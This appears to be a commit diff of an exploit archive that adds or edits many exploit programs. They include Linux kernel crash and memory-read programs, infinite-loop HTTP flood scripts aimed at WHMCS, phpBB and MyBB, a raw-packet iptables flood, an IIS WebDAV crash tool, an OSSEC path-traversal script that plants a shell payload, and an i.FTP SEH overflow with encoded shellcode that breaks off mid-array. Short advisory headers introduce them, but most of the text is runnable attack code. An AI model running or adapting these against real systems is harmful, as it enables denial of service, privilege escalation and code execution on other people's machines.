A local user can crash, hang or currupt the system by sending out a packet with options longer than the maximum IP packet length. An easy way to generate such packet is by using the command "ping -s 65468 -R ANYADDRESS". The -R option is for the IP record route option. Under kernel versions 2.2.X the command will fail with an message of "message too long".
The vulnerability seems to be the result of the kernel not checking aif packet with options is longer than the maximum packet size. A long packet seems to lead to memory corruption.
*/
/* Exploit option length missing checks in Linux-2.0.38
Andrea Arcangeli <andrea@suse.de> */
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <netinet/ip.h>
main()
{
int sk;
struct sockaddr_in sin;
struct hostent * hostent;
#define PAYLOAD_SIZE (0xffff-sizeof(struct udphdr)-sizeof(struct iphdr))
#define OPT_SIZE 1
char payload[PAYLOAD_SIZE];
sk = socket(AF_INET, SOCK_DGRAM, 0);
if (sk < 0)
perror("socket"), exit(1);
if (setsockopt(sk, SOL_IP, IP_OPTIONS, payload, OPT_SIZE) < 0)
perror("setsockopt"), exit(1);
bzero((char *)&sin, sizeof(sin));
sin.sin_port = htons(0);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = htonl(2130706433);
if (connect(sk, (struct sockaddr *) &sin, sizeof(sin)) < 0)
perror("connect"), exit(1);
if (write(sk, payload, PAYLOAD_SIZE) < 0)
perror("write"), exit(1);
}

231
platforms/linux/dos/24696.c Executable file
View file

@ -0,0 +1,231 @@
/*
source: http://www.securityfocus.com/bid/11488/info
It is reported that an integer underflow vulnerability is present in the iptables logging rules of the Linux kernel 2.6 branch.
A remote attacker may exploit this vulnerability to crash a computer that is running the affected kernel.
The 2.6 Linux kernel is reported prone to this vulnerability, the 2.4 kernel is not reported to be vulnerable.
*/
/*
*
* iptables.log.integer.underflow.POC.c
*
* (CAN-2004-0816, BID11488, SUSE-SA:2004:037)
*
* felix__zhou _at_ hotmail _dot_ com
*
* */
#include <stdio.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <time.h>
#pragma comment(lib,"ws2_32")
static unsigned char dip[4];
static unsigned int da;
static unsigned short dp;
static unsigned char dport[2];
static unsigned char sip[4];
static unsigned int sa;
static unsigned short sp;
static unsigned char sport[2];
/*
static void ip_csum(unsigned char *ip, unsigned int size, unsigned char *sum)
{
unsigned int csum = 0;
unsigned char *p = ip;
while (1 < size) {
csum += (p[0] << 8) + p[1];
p += 2;
size -= 2;
}
if (size)
csum += *p;
csum = (csum >> 16) + (csum & 0xffff);
csum += (csum >> 16);
sum[0] = (((unsigned short)(~csum)) >> 8);
sum[1] = ((((unsigned short)(~csum)) << 8) >> 8);
}
*/
static void tcp_csum(unsigned char *tcp, unsigned char *ip,
unsigned int size, unsigned char *sum)
{
unsigned int csum = 0;
unsigned char *p = tcp;
while (1 < size) {
csum += (p[0] << 8) + p[1];
p += 2;
size -= 2;
}
csum += (ip[12] << 8) + ip[13];
csum += (ip[14] << 8) + ip[15];
csum += (ip[16] << 8) + ip[17];
csum += (ip[18] << 8) + ip[19];
csum += 0x06;
csum += 0x14;
if (size)
csum += *p;
csum = (csum >> 16) + (csum & 0xffff);
csum += (csum >> 16);
sum[0] = (((unsigned short)(~csum)) >> 8);
sum[1] = ((((unsigned short)(~csum)) << 8) >> 8);
}
static int work(SOCKET s)
{
DWORD ret = 1;
unsigned char buf[1500];
unsigned char *ip;
unsigned char *tcp;
unsigned int seq = 0x01;
struct sockaddr_in host;
ZeroMemory(buf, 1500);
ip = buf;
tcp = buf + 20;
ip[0] = 0x45; /* ver & hlen */
ip[3] = 0x28; /* tlen */
ip[8] = 0x80; /* ttl */
ip[9] = 0x06; /* protocol */
ip[10] = ip[11] = 0;
ip[12] = sip[0]; /* saddr */
ip[13] = sip[1];
ip[14] = sip[2];
ip[15] = sip[3];
ip[16] = dip[0]; /* daddr */
ip[17] = dip[1];
ip[18] = dip[2];
ip[19] = dip[3];
tcp[0] = sport[0];
tcp[1] = sport[1];
tcp[2] = dport[0]; /* dport */
tcp[3] = dport[1];
tcp[12] = 0x40; /* hlen */ /* HERE */
tcp[13] = 0x02; /* flags */
ZeroMemory(&host, sizeof(struct sockaddr_in));
host.sin_family = AF_INET;
host.sin_port = dp;
host.sin_addr.s_addr = da;
for (;; ) {
tcp[4] = (seq >> 24); /* seq number */
tcp[5] = ((seq << 8) >> 24);
tcp[6] = ((seq << 16) >> 24);
tcp[7] = ((seq << 24) >> 24);
tcp[16] = tcp[17] = 0;
seq ++;
tcp_csum(tcp, ip, 0x14, tcp + 16);
if (SOCKET_ERROR == sendto(s, buf, 0x28, 0,
(SOCKADDR *)&(host), sizeof host)) {
if (WSAEACCES != WSAGetLastError()) {
printf("sendto() failed: %d\n",
WSAGetLastError());
ret = 1;
} else {
printf("You must be Administrator!\n");
}
break;
}
}
return ret;
}
static char usage[] = "Usage: %s dip dport sip sport\n";
int main(int argc, char **argv)
{
WORD ver = MAKEWORD(2, 2);
WSADATA data;
unsigned char *p;
SOCKET s;
int ret = 1;
BOOL eopt = TRUE;
if (5 != argc) {
printf(usage, argv[0]);
goto out;
}
if (INADDR_NONE == (da = inet_addr(argv[1]))) {
printf("dest ip address is NOT valid!\n");
printf(usage, argv[0]);
goto out;
}
p = (unsigned char *)&da;
dip[0] = p[0];
dip[1] = p[1];
dip[2] = p[2];
dip[3] = p[3];
dp = atoi(argv[2]);
dport[0] = ((dp << 16) >> 24);
dport[1] = ((dp << 24) >> 24);
if (INADDR_NONE == (sa = inet_addr(argv[3]))) {
printf("source ip address is NOT valid!\n");
printf(usage, argv[3]);
goto out;
}
p = (unsigned char *)&sa;
sip[0] = p[0];
sip[1] = p[1];
sip[2] = p[2];
sip[3] = p[3];
sp = atoi(argv[4]);
sport[0] = ((sp << 16) >> 24);
sport[1] = ((sp << 24) >> 24);
srand((unsigned int)time(0));
if (WSAStartup(ver, &data)) {
printf("WSAStartup() failed\n");
goto out;
}
if (INVALID_SOCKET == (s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, 0, 0, 0)))
goto err;
if (SOCKET_ERROR == setsockopt(s, IPPROTO_IP, IP_HDRINCL,
(char *)&eopt, sizeof(eopt)))
goto err1;
work(s);
err1:
closesocket(s);
err:
WSACleanup();
out:
return ret;
}

56
platforms/linux/dos/29781.c Executable file
View file

@ -0,0 +1,56 @@
source: http://www.securityfocus.com/bid/23142/info
The Linux kernel is prone to a NULL-pointer dereference vulnerability.
A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. The attacker may also be able to execute arbitrary code with elevated privileges, but this has not been confirmed.
__ ip2.c __
// advanced exploit code for catastrophic kernel bug by Joey Mengele, professional hacker
// user, to dump 0xaddress from kernel memory: ./ip2 0xaddress
#include <sys/signal.h>
typedef int fg8;
#include <sys/mman.h>
typedef long _l36;
#include <string.h>
typedef long * jayn9124;
#include <stdio.h>
typedef char * anal;
#include <netinet/in.h>
#define __exit main
#define __main exit
typedef void pleb;
#include <stdlib.h>
fg8 ___hh(fg8,_l36,jayn9124);
#include <unistd.h>
pleb _zzy();
# define __f4 setsockopt
# define __f5 getsockopt
fg8 __exit(fg8 argc, anal *argv[]) {
_l36 tmp;
fg8 s;
_l36 hud;
if (argc!=2) __main(-1);
if (1 != sscanf(argv[1]," 0x%x",&hud)) __main(-1);
signal(SIGSEGV,&exit);
s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
_zzy();
__f4(s, IPPROTO_IPV6, 6, (void *)NULL, 0);
___hh(s,hud,&tmp);
printf("Kernel memory @ %.8x contains %.8x\n",hud,tmp);
return 0;
}
int ___hh(int bf,_l36 _rtg,jayn9124 rape)
{
fg8 ot=4;
*(jayn9124)(0x8) = _rtg;
return __f5(bf,IPPROTO_IPV6,59,(void *)rape,&ot);
}
void _zzy()
{
_l36 *gol = NULL;
if( (gol = mmap( (void *)NULL, 4096,
PROT_READ|PROT_WRITE, MAP_FIXED |MAP_ANONYMOUS | MAP_PRIVATE, 0, 0
)) == (void *) -1 )
{perror( "mmap" );exit(412);}
}
__ ip2.c EOF __

43
platforms/linux/dos/32815.c Executable file
View file

@ -0,0 +1,43 @@
/*
source: http://www.securityfocus.com/bid/33906/info
The Linux kernel is prone to an origin-validation weakness when dealing with signal handling.
This weakness occurs when a privileged process calls attacker-supplied processes as children. Attackers may exploit this to send arbitrary signals to the privileged parent process.
A local attacker may exploit this issue to kill vulnerable processes, resulting in a denial-of-service condition. In some cases, other attacks may also be possible.
Linux kernel 2.6.28 is vulnerable; other versions may also be affected.
*/
#include <sched.h>
#include <signal.h>
#include <stdlib.h>
#include <unistd.h>
static int the_child(void* arg) {
sleep(1);
_exit(2);
}
int main(int argc, const char* argv[]) {
int ret = fork();
if (ret < 0)
{
perror("fork");
_exit(1);
}
else if (ret > 0)
{
for (;;);
}
setgid(99);
setuid(65534);
{
int status;
char* stack = malloc(4096);
int flags = SIGKILL | CLONE_PARENT;
int child = clone(the_child, stack + 4096, flags, NULL);
}
_exit(100);
}

9
platforms/linux/dos/33228.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/36423/info
The Linux kernel is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Local attackers may be able to exploit this issue to run arbitrary code with elevated privileges. Failed exploit attempts may crash the affected kernel, denying service to legitimate users.
The Linux Kernel 2.6.31-rc1 through 2.6.31 are vulnerable.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33228.tgz

8
platforms/linux/dos/38465.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/59055/info
The Linux kernel is prone to multiple local denial-of-service vulnerabilities.
Attackers can exploit these issues to trigger a kernel crash, which may result in a denial-of-service condition.
cd /sys/kernel/debug/tracing
echo 1234 | sudo tee -a set_ftrace_pid

2
platforms/linux/local/14273.sh
View file

@ -1,5 +1,7 @@
#!/bin/sh
#
# EDB Note: Updated exploit ~ https://www.exploit-db.com/exploits/14339/
#
# Exploit Title: Ubuntu PAM MOTD file tampering (privilege escalation)
# Date: July 7, 2010
# Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com>

2
platforms/linux/local/15074.sh
View file

@ -1,4 +1,4 @@
Source: http://www.securityfocus.com/bid/43084/info
# Source: http://www.securityfocus.com/bid/43084/info
#!/bin/sh
# by fuzz. For Anux inc. #

20
platforms/linux/local/18228.sh
View file

@ -1,13 +1,13 @@
Exploit Title: Acpid Privilege Boundary Crossing Vulnerability
Google Dork:
Date: 23-11-2011
Author: otr
Software Link: https://launchpad.net/ubuntu/+source/acpid
Version: 1:2.0.10-1ubuntu2
Tested on: Ubuntu 11.10, Ubuntu 11.04
CVE : CVE-2011-2777
--
Safeguard this letter, it may be an IMPORTANT DOCUMENT
# Exploit Title: Acpid Privilege Boundary Crossing Vulnerability
# Google Dork:
# Date: 23-11-2011
# Author: otr
# Software Link: https://launchpad.net/ubuntu/+source/acpid
# Version: 1:2.0.10-1ubuntu2
# Tested on: Ubuntu 11.10, Ubuntu 11.04
# CVE : CVE-2011-2777
# --
# Safeguard this letter, it may be an IMPORTANT DOCUMENT
#!/bin/bash
#

2
platforms/linux/local/25287.c
View file

@ -1,5 +1,5 @@
/*
EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/25290/
EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/926/
source: http://www.securityfocus.com/bid/12911/info

2
platforms/linux/local/25288.c
View file

@ -1,5 +1,5 @@
/*
EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/25290/
EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/926/
source: http://www.securityfocus.com/bid/12911/info

2
platforms/linux/local/38390.c
View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/58478/info
Linux kernel is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to gain kernel privileges, which will aid in further attacks.
*/
/* clown-newuser.c -- CLONE_NEWUSER kernel root PoC
*

71
platforms/php/dos/37728.py Executable file
View file

@ -0,0 +1,71 @@
###########################################################
# Exploit Title: [OSSEC]
# Date: [2015-08-01]
# Exploit Author: [Milad Saber]
# Vendor Homepage: [www.ossec.net]
# Software Link: [www.ossec.net/files/ossec-wui-0.8.tar.gz]
# Version: [0.8]
# Tested on: [OSSEC Manager]
# Exploit for DOS ossec server.
# Please install ossec server and WUI 0.8 and run this exploit
##########################################################
import socket
import sys
import time
# specify payload
payload = '[ "$(id -u)" == "0" ] && touch /var/ossec/ossec.conf' # to exploit only on root
user = 'root'
pwd = 'var'
if len(sys.argv) != 2:
sys.stderr.write("[-]Usage: python %s <ip>\ossec-wui-0.8" % sys.argv[0])
sys.stderr.write("[-]Exemple: python %s 127.0.0.1\ossec-wui-0.8" % sys.argv[0])
sys.exit(1)
ip = sys.argv[1]
def recv(s):
s.recv(1024)
time.sleep(0.2)
try:
print "[+]Connecting to milad exploit ..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,4555))
s.recv(1024)
s.send(user + "\n")
s.recv(1024)
s.send(pwd + "\n")
s.recv(1024)
print "[+]Creating user..."
s.send("adduser ../../../../../../../../var/ossec/ossec.conf exploit\n")
s.recv(1024)
s.send("quit\n")
s.close()
print "[+]Connecting to SMTP server..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,25,80))
s.send("hello milad@milad.pl\r\n")
recv(s)
print "[+]Sending payload..."
s.send("mail from: <'@milad.pl>\r\n")
recv(s)
# also try s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf/r\n") if the recipient cannot be found
s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf\r\n")
recv(s)
s.send("data\r\n")
recv(s)
s.send("From: milad@milad.pl\r\n")
s.send("\r\n")
s.send("'\n")
s.send(payload + "\n")
s.send("\r\n.\r\n")
recv(s)
s.send("quit\r\n")
recv(s)
s.close()
print "[+]Done! Payload will be executed once somebody logs in."
except:
print "Connection failed."

82
platforms/php/dos/39091.pl Executable file
View file

@ -0,0 +1,82 @@
/*
source: http://www.securityfocus.com/bid/65470/info
WHMCS is prone to a denial-of-service vulnerability.
Successful exploits may allow attackers to cause denial-of-service condition, denying service to legitimate users.
WHMCS 5.12 is vulnerable; other versions may also be affected.
*/
#!/usr/bin/perl
#################################
#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#
#####################################
#####################################
# Iranian Exploit DataBase
# WHMCS Denial of Service Vulnerability
# Test on Whmcs 5.12
# Vendor site : www.whmcs.com
# Code Written By Amir - iedb.team () gmail com - o0_shabgard_0o () yahoo com
# Site : Www.IeDb.Ir/acc - Www.IrIsT.Ir
# Fb Page : https://www.facebook.com/iedb.ir
# Greats : Medrik - Bl4ck M4n - ErfanMs - TaK.FaNaR - F () riD - N20 - Bl4ck N3T - 0x0ptim0us - 0Day
# E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - z3r0 - Mr.Zer0 - one alone hacker
# DICTATOR - dr.koderz - E1.Coders - Security - ARTA - ARYABOD - Behnam Vanda - C0dex - Dj.TiniVini
# Det3cT0r - yashar shahinzadeh And All Members In IeDb.Ir/acc
#####################################
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$data = "ajax=1&a=domainoptions&sld=saddddd&tld=saasssssssssss&checktype=owndomain";
$len = length $data;
$foo = "POST ".$dir."cart.php HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "################################################# \n";
print "## WHMCS Denial of Service Vulnerability\n";
print "## Discoverd By Amir - iedb.team () gmail com - Id : o0_shabgard_0o \n";
print "## Www.IeDb.Ir/acc - Www.IrIsT.Ir \n";
print "################################################# \n";
print "## [host] [path] \n";
print "## http://host.com /whmcs/\n";
print "################################################# \n";
exit();
};
#####################################
# Archive Exploit = http://www.iedb.ir/exploits-1300.html
#####################################

79
platforms/php/dos/39092.pl Executable file
View file

@ -0,0 +1,79 @@
source: http://www.securityfocus.com/bid/65481/info
phpBB is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
###########################
# Phpbb Forum Denial of Service Vulnerability
###########################
#!/usr/bin/perl
# Iranian Exploit DataBase
# Phpbb Forum Denial of Service Vulnerability
# Version: All Version
# Vendor site : http://www.phpbb.com
# Code Written By Amir - iedb.team@gmail.com - o0_iedb_0o@yahoo.com
# Site : Www.IeDb.Ir - Www.IrIsT.Ir
# Fb Page :
https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
# Greats : TaK.FaNaR - ErfanMs - Medrik - F@riD - Bl4ck M4n - 0x0ptim0us
- 0Day - Dj.TiniVini - E2MA3N
# l4tr0d3ctism - H-SK33PY - Noter - r3d_s0urc3 - Dr_Evil And All
Members In IeDb.Ir/acc
#####################################
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$data =
"securitytoken=guest&do=process&query=%DB%8C%D8%B3%D8%A8%D9%84%D8%B3%DB%8C%D9%84%D8%B3%DB%8C%D8%A8%D9%84%0%0%0%0%0%0%0%0%0%0&submit.x=0&submit.y=0";
$len = length $data;
$foo = "POST ".$dir."search.php?do=process HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\n";
print "################################################# \n";
print "## Phpbb Forum Denial of Service Vulnerability\n";
print "## Discoverd By Amir - iedb.team@gmail.com - Id : o0_iedb_0o \n";
print "## Www.IeDb.Ir - Www.IrIsT.Ir \n";
print "################################################# \n";
print "## [host] [path] \n";
print "## http://host.com /forum/\n";
print "################################################# \n";
print "\n";
exit();
};
#####################################
# Archive Exploit = http://www.iedb.ir/exploits-868.html
#####################################
###########################
# Iranian Exploit DataBase = http://IeDb.Ir [2013-11-17]
###########################

82
platforms/php/dos/39095.pl Executable file
View file

@ -0,0 +1,82 @@
source: http://www.securityfocus.com/bid/65545/info
MyBB is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
MyBB 1.6.12 is vulnerable; other versions may be also be affected.
# Mybb All Version Denial of Service Vulnerability
#!/usr/bin/perl
# Iranian Exploit DataBase
# Mybb All Version Denial of Service Vulnerability
# Test on Mybb 1.6.12
# Vendor site : www.mybb.com
# Code Written By Amir - iedb.team () gmail com - o0_shabgard_0o ()
yahoo com
# Site : Www.IeDb.Ir/acc - Www.IrIsT.Ir
# Fb Page : https://www.facebook.com/iedb.ir
# Greats : Medrik - Bl4ck M4n - ErfanMs - TaK.FaNaR - F () riD - N20 -
Bl4ck N3T - 0x0ptim0us - 0Day
# E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil -
z3r0 - Mr.Zer0 - one alone hacker
# DICTATOR - dr.koderz - E1.Coders - Security - ARTA - ARYABOD - Behnam
Vanda - C0dex - Dj.TiniVini
# Det3cT0r - yashar shahinzadeh And All Members In IeDb.Ir/acc
#####################################
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$data =
"forums%5B%5D=all&version=rss2.0&limit=1500000&make=%D8%AF%D8%B1%DB%8C%D8%A7%D9%81%D8%AA+%D9%84%DB%8C%D9%86%DA%A9+%D9%BE%DB%8C%D9%88%D9%86%D8%AF+%D8%B3%D8%A7%DB%8C%D8%AA%DB%8C";
$len = length $data;
$foo = "POST ".$dir."misc.php?action=syndication HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "################################################# \n";
print "## Mybb All Version Denial of Service Vulnerability\n";
print "## Discoverd By Amir - iedb.team () gmail com - Id :
o0_shabgard_0o \n";
print "## Www.IeDb.Ir/acc - Www.IrIsT.Ir \n";
print "################################################# \n";
print "## [host] [path] \n";
print "## http://host.com /mybb/\n";
print "################################################# \n";
exit();
};
#####################################
# Archive Exploit = http://www.iedb.ir/exploits-1332.html
#####################################
###########################
# Iranian Exploit DataBase = http://IeDb.Ir [2014-02-12]
###########################

174
platforms/windows/dos/22670.c Executable file
View file

@ -0,0 +1,174 @@
/*
source: http://www.securityfocus.com/bid/7735/info
Microsoft Internet Information Services has been reported vulnerable to a denial of service.
When WebDAV receives excessively long requests to the 'PROPFIND' or 'SEARCH' variables, the IIS service will fail. All current web, FTP, and email sessions will be terminated.
IIS will automatically restart and normal service will resume.
** It has been reported that if a WebDAV request with a certain number of bytes is received, the Inetinfo service will remain alive but cease serving requests. This will cause the IIS server to stop serving requests until the service is manually restarted.
*/
/*
IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+
Bid: 7735
*/
#define ERROR -1
#define OK 1
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
int check_for_iis();
void screw_iis();
void usage();
char IP[15];
int main(int argc, char *argv[])
{
/* cout << "Hello, World!" << endl; */
if(argc !=2)
{
usage(); exit(0);
}
printf("IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+\n");
strcpy(IP, argv[1]);
if(check_for_iis() != OK)
{
printf("Sorry, BAD LUCK! \n"); exit(0);
}
screw_iis();
return EXIT_SUCCESS;
}
int check_for_iis()
{
int sck, flag = 1;
struct sockaddr_in sin;
char req[50];
sck = socket(AF_INET, SOCK_STREAM, 0);
if(sck == ERROR)
{
perror("Socket error "); exit(0);
}
sin.sin_port = htons(80);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(IP);
if ((connect(sck, (struct sockaddr *) &sin, sizeof(sin))) == -1)
{
perror("Connect Error "); exit(0);
}
strcpy(req, "GET / HTTP/1.0\r\n\n");
send(sck, req, sizeof(req), 0);
recv(sck, req, sizeof(req), 0);
if (strstr(req,"IIS") == NULL)
{
printf(" Not an IIS server! \n");
flag = 0;
}
sprintf(req,"SEARCH / HTTP/1.0\r\n\n",40);
send(sck, req, sizeof(req), 0);
recv(sck, req, sizeof(req), 0);
if (strstr(req,"HTTP/1.1 411 Length Required") == NULL)
{
printf("METHOD SEARCH NOT ALLOWED. \n");
flag = 0;
}
return(flag);
}
void screw_iis()
{
int sck, flag = 1;
struct sockaddr_in sin;
char junk[100];
char buffer[65535] ="";
char request[80000];
char content[] =
"<?xml version=\"1.0\"?>\r\n"
"<g:searchrequest xmlns:g=\"DAV:\">\r\n"
"<g:sql>\r\n"
"Select \"DAV:displayname\" from scope()\r\n"
"</g:sql>\r\n"
"</g:searchrequest>\r\n";
sck = socket(AF_INET, SOCK_STREAM, 0);
if(sck == ERROR)
{
perror("Socket error "); exit(0);
}
sin.sin_port = htons(80);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(IP);
if ((connect(sck, (struct sockaddr *) &sin, sizeof(sin))) == -1)
{
perror("Connect Error "); exit(0);
}
buffer[sizeof(buffer)]=0x00;
memset(buffer,'S',sizeof(buffer));
memset(request,0,sizeof(request));
memset(junk,0,sizeof(junk));
sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nCon
tent-Length: ",buffer,IP);
sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
printf("\r\nScrewing the server... \n");
send(sck,request,strlen(request),0);
send(sck,content,strlen(content),0);
recv(sck,junk,sizeof(junk),0);
if(junk[0]==0x00)
{
printf("Server is Screwed! \r\n");
}
else
{
printf("BAD LUCK. Patched.\n");
}
}
void usage()
{
printf("IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+\n");
printf("Usage\r\n");
printf("Screw_IIS <victim IP>\n");
}

70
platforms/windows/dos/39782.py Executable file
View file

@ -0,0 +1,70 @@
#!/usr/bin/python
# Exploit Title: i.FTP 2.21 Host Address / URL Field SEH Exploit
# Date: 3-5-2016
# Exploit Author: Tantaryu MING
# Vendor Homepage: http://www.memecode.com/iftp.php
# Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe
# Version: 2.21
# Tested on: Windows 7 SP1 x86_64
# How to exploit: Connect -> Host Address / URL -> copy + paste content of evil.txt -> Press 'Connect' button
'''
msfvenom -p windows/exec CMD=calc -e x86/alpha_upper -a x86 -f c -b '\x00\x0d\x20\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferREgister=EAX
'''
shellcode = (
"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
"\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
"\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
"\x4c\x5a\x48\x4b\x32\x35\x50\x33\x30\x43\x30\x33\x50\x4d\x59"
"\x4a\x45\x36\x51\x39\x50\x42\x44\x4c\x4b\x30\x50\x56\x50\x4c"
"\x4b\x51\x42\x34\x4c\x4c\x4b\x30\x52\x35\x44\x4c\x4b\x42\x52"
"\x31\x38\x44\x4f\x58\x37\x51\x5a\x57\x56\x30\x31\x4b\x4f\x4e"
"\x4c\x47\x4c\x35\x31\x43\x4c\x53\x32\x56\x4c\x51\x30\x59\x51"
"\x58\x4f\x34\x4d\x53\x31\x49\x57\x4b\x52\x4a\x52\x50\x52\x50"
"\x57\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x50\x4a\x37\x4c\x4c\x4b"
"\x30\x4c\x54\x51\x52\x58\x4b\x53\x50\x48\x35\x51\x38\x51\x50"
"\x51\x4c\x4b\x31\x49\x47\x50\x33\x31\x48\x53\x4c\x4b\x51\x59"
"\x32\x38\x4d\x33\x47\x4a\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x35"
"\x51\x59\x46\x56\x51\x4b\x4f\x4e\x4c\x59\x51\x48\x4f\x54\x4d"
"\x45\x51\x58\x47\x57\x48\x4d\x30\x33\x45\x4a\x56\x55\x53\x53"
